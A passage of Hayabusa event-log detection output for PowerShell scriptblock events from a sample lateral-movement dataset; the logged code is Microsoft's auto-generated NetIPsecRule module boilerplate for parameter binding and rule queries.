($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 
'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewP",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and 
config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"olicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' -Alias '*' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"olicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown 
